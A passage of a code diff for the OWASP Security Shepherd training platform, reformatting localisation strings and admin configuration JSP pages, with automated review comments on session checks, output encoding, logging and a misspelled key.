+getStarted.text.info.changePassword = Your password is a temporary password. This means that somebody else knows it! Lets keep things secure and change your password now!
+login.text.info = \u7528\u4F60\u7684 Security Shepherd \u8BC1\u4E66 \u767B\u5F55.
+login.text.regInfo = \u6CE8\u518C\u4E00\u4E2A Security Shepherd \u5E10\u6237!
+login.text.about_blurb = The OWASP Security Shepherd project has been designed and implemented with the aim of fostering and improving application security awareness among a varied skill-set demographic.This project enables users to learn or to improve upon existing manual penetration testing skills. This is accomplished through lesson and challenge techniques. A lesson provides a user with a lot of help in completing that module, where a challenge puts what the user learned in the lesson to use.
The OWASP Security Shepherd project covers the OWASP Top Ten web app risks and also covers the OWASP Top Ten Mobile risks as well. Using these risks as a challenge test bed, common security vulnerabilities can be explored and their impact on a system understood. Many of these levels include insufficient mitigations and protections to these risks, such as blacklist filters, atrocious encoding schemes, barbaric security mechanisms and poor security configuration. The modules have been crafted to provide not only a challenge for a security novice, but security professionals as well.
+login.text.sponsers_blurb = OWASP Security Shepherd \u9879\u76EE\u7684\u5168\u7EC4\u4EBA\u5458\u7531\u8877\u7684\u611F\u8C22\u8D5E\u52A9\u5546\u4EEC\u7684\u5927\u529B\u652F\u6301\u002C\u8BF7\u901A\u8FC7\u67E5\u770B\u4ED6\u4EEC\u7684\u7F51\u7AD9\u548C Twitter \u6765\u5173\u6CE8\u4ED6\u4EEC\u002E.
+login.text.thanks = OWASP Security Shepherd \u9879\u76EE\u7EC4\u8FD8\u8981\u7279\u522B\u611F\u8C22\u5B89\u4E1C\u5C3C\u00B7\u57FA\u6069\u535A\u58EB\u548C\u7231\u5C14\u5170\u5E03\u5170\u5BDF\u7406\u5DE5\u5B66\u9662\u5B89\u5168\u7814\u7A76\u9662\u7684\u652F\u6301" https://owasp.securityShepherd.eu.
+readyToPlay.text.info.notReady = Refresh the home page! If this error persists; Log out and back in! If this error continues to persist, please contact an Administrator!
+readyToPlay.text.info.enteredGame = Now that you can see this, you're good to go! Get cracking on lessons and challenges!
Remember, the levels you are playing are sub applications. Keep the game play in these applications! Stay away from your session ID's! You'll just log yourself out of you change them!
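Review bot: The key on the added `ggetStarted.text.configureShepherd.asAnAdmin` line still carries the doubled `g` from the removed line, so this whitespace reformat keeps a key that no caller is likely to ask for. The text_pt.properties hunk above spells it `getStarted.text.configureShepherd.asAnAdmin`, so a zh lookup of that name would presumably miss this entry and fall back to the parent bundle. The line should start `getStarted.text.configureShepherd.asAnAdmin = As you are an Administrator ...`. Separately, the second lines of `login.text.about_blurb` and `readyToPlay.text.info.enteredGame` show no trailing backslash in this view; if that is how the file is stored rather than a rendering artifact, the properties loader would read each as a new key, which is worth confirming.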
- You are currently using Security Shepherd Version 3.2
- The OWASP Security Shepherd project is a web and mobile
- application security training platform. Security Shepherd has been
- designed to foster and improve security awareness among a varied
- skill-set demographic. The aim of this project is to take AppSec
- novices or experienced engineers and sharpen their penetration testing
- skill set to security expert status. For More information, please visit
- the OWASP Security
- Shepherd Wiki Page.
- Please report any bugs or any feature requests on the OWASP Security
- Shepherd Git Repository.
+ You are currently using Security Shepherd Version 3.2
+ The OWASP Security Shepherd project is a web and mobile
+ application security training platform. Security Shepherd has been
+ designed to foster and improve security awareness among a varied
+ skill-set demographic. The aim of this project is to take AppSec
+ novices or experienced engineers and sharpen their penetration testing
+ skill set to security expert status. For More information, please visit
+ the OWASP Security
+ Shepherd Wiki Page.
+ Please report any bugs or any feature requests on the OWASP Security
+ Shepherd Git Repository.
<%= Analytics.sponsorshipMessage(new Locale(Validate.validateLanguage(request.getSession()))) %>
-
-
+
+
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
diff --git a/src/main/webapp/admin/config/configCheats.jsp b/src/main/webapp/admin/config/configCheats.jsp
index c4ea06324..dbb1d8a27 100644
--- a/src/main/webapp/admin/config/configCheats.jsp
+++ b/src/main/webapp/admin/config/configCheats.jsp
@@ -1,185 +1,203 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configCheats.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configCheats.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configCheats.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configCheats.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String ApplicationRoot = getServletContext().getRealPath("");
%>
Configure Cheat Sheets
The Security Shepherd Application is capable of presenting users
- with "Cheat Sheets" that will instruct the reader on how to
- complete a specific module. These cheats are disabled by default, but
- can be enabled for administrators or all players. Once enabled, as you
- open Security Shepherd modules, a cheat button will appear in the left
- hand menu. Click this button to reveal the cheat sheet for the
- currently open module.
+ with "Cheat Sheets" that will instruct the reader on how to
+ complete a specific module. These cheats are disabled by default, but
+ can be enabled for administrators or all players. Once enabled, as you
+ open Security Shepherd modules, a cheat button will appear in the left
+ hand menu. Click this button to reveal the cheat sheet for the
+ currently open module.
-
- style="display: none;" <% } %>>
-
Enable Cheat Sheets
-
Enable cheat sheets for administrators or all users.
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ //Show Enable Dialog
+ $("#enableCheats").slideDown("slow");
+ });
+ });
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
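Review bot: The outer guard `if (request.getSession() != null)` at the top of the scriptlet can never be false, because `getSession()` with no argument creates a session when none exists. The final `else` redirect is therefore dead code, and every unauthenticated hit on this admin page allocates a new session. Fetching the session with `HttpSession ses = request.getSession(false);` and testing `if (ses != null)` would make the guard meaningful, leaving `Validate.validateAdminSession` as a second check rather than the only one. The same pattern appears in the configFeedback.jsp, scoreboard.jsp, setCoreDatabase.jsp, updateRegistration.jsp and changeLevelLayout.jsp hunks of this diff.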
diff --git a/src/main/webapp/admin/config/configFeedback.jsp b/src/main/webapp/admin/config/configFeedback.jsp
index ed4072f38..a4bfe009a 100644
--- a/src/main/webapp/admin/config/configFeedback.jsp
+++ b/src/main/webapp/admin/config/configFeedback.jsp
@@ -1,155 +1,170 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configFeedback.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: configFeedback.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configFeedback.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(configFeedback.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
-
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+
+ String csrfToken = Encode.forHtml(tokenCookie.getValue());
+ String ApplicationRoot = getServletContext().getRealPath("");
%>
Configure Feedback
- You can configure Shepherd to force users to submit a feedback form
- before the module is marked as complete. This is used both to
- facilitate project improvements based on feedback submitted and for
- system administrators to collect "Reports of Understanding" from their
- students. If you would like to submit the collected feedback to the
- Security Shepherd Project Development Team, please follow the steps found
- here.
+ You can configure Shepherd to force users to submit a feedback form
+ before the module is marked as complete. This is used both to
+ facilitate project improvements based on feedback submitted and for
+ system administrators to collect "Reports of Understanding" from their
+ students. If you would like to submit the collected feedback to the
+ Security Shepherd Project Development Team, please follow the steps found
+ here.
-
- style="display: none;" <% } %>>
-
Enable Feedback
-
Enable feedback to force users to submit feedback on each module
- before they can complete them
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ //Show Enable Dialog
+ $("#enableFeedback").slideDown("slow");
+ });
+ });
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
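Review bot: `csrfToken` is built with `Encode.forHtml(tokenCookie.getValue())` here, as in configCheats.jsp and setCoreDatabase.jsp, while scoreboard.jsp, updateRegistration.jsp and changeLevelLayout.jsp in the same diff use `Encode.forHtmlAttribute`. The markup where the token is written is not visible in this hunk, so which encoder is correct cannot be confirmed from here. The encoder should be chosen by output context and applied consistently across the admin pages. If the value ends up inside a script string literal, `Encode.forJavaScript(...)` is the context-appropriate call. A short comment next to the assignment naming the sink would keep the choice reviewable.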
diff --git a/src/main/webapp/admin/config/scoreboard.jsp b/src/main/webapp/admin/config/scoreboard.jsp
index d30788f00..9b059e494 100644
--- a/src/main/webapp/admin/config/scoreboard.jsp
+++ b/src/main/webapp/admin/config/scoreboard.jsp
@@ -1,491 +1,476 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="servlets.Register,java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="servlets.Register,java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "DEBUG: scoreboard Config.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "DEBUG: scoreboard Config.jsp *************************");
- /**
- * This file is part of the Security Shepherd Project.
- *
- * The Security Shepherd project is free software: you can redistribute it and/or modify
- * it under the terms of the GNU General Public License as published by
- * the Free Software Foundation, either version 3 of the License, or
- * (at your option) any later version.
- *
- * The Security Shepherd project is distributed in the hope that it will be useful,
- * but WITHOUT ANY WARRANTY; without even the implied warranty of
- * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
- * GNU General Public License for more details.
- *
- * You should have received a copy of the GNU General Public License
- * along with the Security Shepherd project. If not, see .
- *
- * @author Mark Denihan
- */
+ /**
+ * This file is part of the Security Shepherd Project.
+ *
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+ * GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project. If not, see .
+ *
+ * @author Mark Denihan
+ */
- if (request.getSession() != null) //Session If
- {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
- //Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "DEBUG(scoreboardConfig.jsp): tokenCookie Error:" + htmlE.toString());
- }
- // validateAdminSession ensures a valid session, and valid administrator credentials
- // Also, if tokenCookie != null, then the page is good to continue loading
- // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
- // Getting Session Variables
- //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
+ if (request.getSession() != null) //Session If
+ {
+ HttpSession ses = request.getSession();
+ Getter get = new Getter();
+ //Getting CSRF Token from client
+ Cookie tokenCookie = null;
+ try {
+ tokenCookie = Validate.getToken(request.getCookies());
+ } catch (Exception htmlE) {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "DEBUG(scoreboardConfig.jsp): tokenCookie Error:" + htmlE.toString());
+ }
+ // validateAdminSession ensures a valid session, and valid administrator credentials
+ // Also, if tokenCookie != null, then the page is good to continue loading
+ // Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
+ Object tokenParmeter = request.getParameter("csrfToken");
+ if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ // Getting Session Variables
+ //The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
- ResultSet classList = Getter.getClassInfo(ApplicationRoot);
- boolean showClasses = true;
- try {
- showClasses = classList.next();
- } catch (SQLException e) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
- "Could not open classList: " + e.toString(), ses.getAttribute("userName"));
- showClasses = false;
- }
+ String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+ String ApplicationRoot = getServletContext().getRealPath("");
+ ResultSet classList = Getter.getClassInfo(ApplicationRoot);
+ boolean showClasses = true;
+ try {
+ showClasses = classList.next();
+ } catch (SQLException e) {
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"),
+ "Could not open classList: " + e.toString(), ses.getAttribute("userName"));
+ showClasses = false;
+ }
%>
When users visit the scoreboard, they will only see a list of
- users from their class. Admins that visit the scoreboard will still
- see the scoreboard the default class.
When users visit the scoreboard, they will only see a list of
+ users from their class. Admins that visit the scoreboard will still
+ see the scoreboard the default class.
<%
- if (Analytics.googleAnalyticsOn) {
+ if (Analytics.googleAnalyticsOn) {
%><%=Analytics.googleAnalyticsScript%>
<%
- }
+ }
%>
<%
- } //Valid Session If
- else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } //Session If
- else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+ } //Valid Session If
+ else {
+ response.sendRedirect("../../loggedOutSheep.html");
+ }
+ } //Session If
+ else {
+ response.sendRedirect("../../loggedOutSheep.html");
+ }
%>
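Review bot: `showClasses = classList.next();` is guarded only by `catch (SQLException e)`, so a null return from `Getter.getClassInfo(ApplicationRoot)` would surface as an uncaught NullPointerException instead of falling back to `showClasses = false`. Whether `getClassInfo` can return null is not visible here, but `showClasses = classList != null && classList.next();` makes the fallback explicit at no cost. No `classList.close()` is visible in this hunk either, so it is worth confirming that the rest of the page closes the ResultSet once the class list has been rendered.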
diff --git a/src/main/webapp/admin/config/setCoreDatabase.jsp b/src/main/webapp/admin/config/setCoreDatabase.jsp
index 85b1e73ad..28922df3e 100644
--- a/src/main/webapp/admin/config/setCoreDatabase.jsp
+++ b/src/main/webapp/admin/config/setCoreDatabase.jsp
@@ -1,129 +1,141 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setCoreDatabase.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: setCoreDatabase.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setCoreHostAddress.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(setCoreHostAddress.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtml(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtml(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
Core Database Server Info
If you are using a non-standard database configuration for
- Security Shepherd, you will need to specify the following information
- for your core database.
+ Security Shepherd, you will need to specify the following information
+ for your core database.
-
-
+
+
Sorry but there was an error: " + ajaxCall.status + " " + ajaxCall.statusText + "
");
+ $("#badData").show("slow");
+ }
+ $("#theStep").slideDown("slow");
+ $('html, body').animate({
+ scrollTop: $("#resultsDiv").offset().top
+ }, 1000);
+ });
+ });
+ });
+
+<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
<% } %>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
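Review bot: The catch block logs `"DEBUG(setCoreHostAddress.jsp): tokenCookie Error:"` although this file is setCoreDatabase.jsp, so token failures on the database-configuration page are attributed to a different page in the logs. The reformat carried the string over unchanged. Changing it to `"DEBUG(setCoreDatabase.jsp): tokenCookie Error:"` keeps access-attempt triage accurate and matches the label on the first `logEvent` call of this file.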
diff --git a/src/main/webapp/admin/config/updateRegistration.jsp b/src/main/webapp/admin/config/updateRegistration.jsp
index d0c815a30..158f0d944 100644
--- a/src/main/webapp/admin/config/updateRegistration.jsp
+++ b/src/main/webapp/admin/config/updateRegistration.jsp
@@ -1,154 +1,167 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
+ import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
+ errorPage=""%>
<%
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: updateRegistration.jsp *************************");
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG: updateRegistration.jsp *************************");
/**
* This file is part of the Security Shepherd Project.
- *
+ *
* The Security Shepherd project is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
- *
+ *
* The Security Shepherd project is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
- *
+ *
* You should have received a copy of the GNU General Public License
* along with the Security Shepherd project. If not, see .
- *
+ *
* @author Mark Denihan
*/
-
- if (request.getSession() != null) {
- HttpSession ses = request.getSession();
- Getter get = new Getter();
+
+if (request.getSession() != null)
+{
+HttpSession ses = request.getSession();
+Getter get = new Getter();
//Getting CSRF Token from client
- Cookie tokenCookie = null;
- try {
- tokenCookie = Validate.getToken(request.getCookies());
- } catch (Exception htmlE) {
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(updateRegistration.jsp): tokenCookie Error:" + htmlE.toString());
- }
+Cookie tokenCookie = null;
+try
+{
+ tokenCookie = Validate.getToken(request.getCookies());
+}
+catch(Exception htmlE)
+{
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "DEBUG(updateRegistration.jsp): tokenCookie Error:" + htmlE.toString());
+}
// validateAdminSession ensures a valid session, and valid administrator credentials
// Also, if tokenCookie != null, then the page is good to continue loading
// Token is now validated when accessing admin pages to stop attackers causing other users to tigger logs of access attempts
- Object tokenParmeter = request.getParameter("csrfToken");
- if (Validate.validateAdminSession(ses, tokenCookie, tokenParmeter)) {
- //Logging Username
- ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+Object tokenParmeter = request.getParameter("csrfToken");
+if(Validate.validateAdminSession(ses, tokenCookie, tokenParmeter))
+{
+ //Logging Username
+ ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), "Accessed by: " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
// Getting Session Variables
//The org.owasp.encoder.Encode class should be used to encode any softcoded data. This should be performed everywhere for safety
- String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
- String ApplicationRoot = getServletContext().getRealPath("");
+String csrfToken = Encode.forHtmlAttribute(tokenCookie.getValue());
+String ApplicationRoot = getServletContext().getRealPath("");
%>
<%
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
- } else {
- response.sendRedirect("../../loggedOutSheep.html");
- }
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
+}
+else
+{
+response.sendRedirect("../../loggedOutSheep.html");
+}
%>
\ No newline at end of file
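Review bot: Every `ShepherdLogManager.logEvent(...)` call in this hunk passes `request.getHeader("X-Forwarded-For")` straight through, and the first call runs before any session or token check, so a client-chosen string reaches the logger on unauthenticated requests. `ShepherdLogManager` is not shown in this part of the diff; if it does not already strip CR/LF and bound the length, that belongs there once rather than in each JSP. A comment at the first call such as `// X-Forwarded-For is client-supplied; logEvent must neutralise it before writing` would record the assumption. The other admin JSP hunks in this diff make the same calls.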
diff --git a/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp b/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp
index fc17edfbc..e26be00c8 100644
--- a/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp
+++ b/src/main/webapp/admin/moduleManagement/changeLevelLayout.jsp
@@ -1,272 +1,284 @@
<%@ page contentType="text/html; charset=iso-8859-1" language="java"
- import="java.sql.*,java.io.*,java.net.*,org.owasp.encoder.Encode, dbProcs.*, utils.*"
- errorPage="" %>
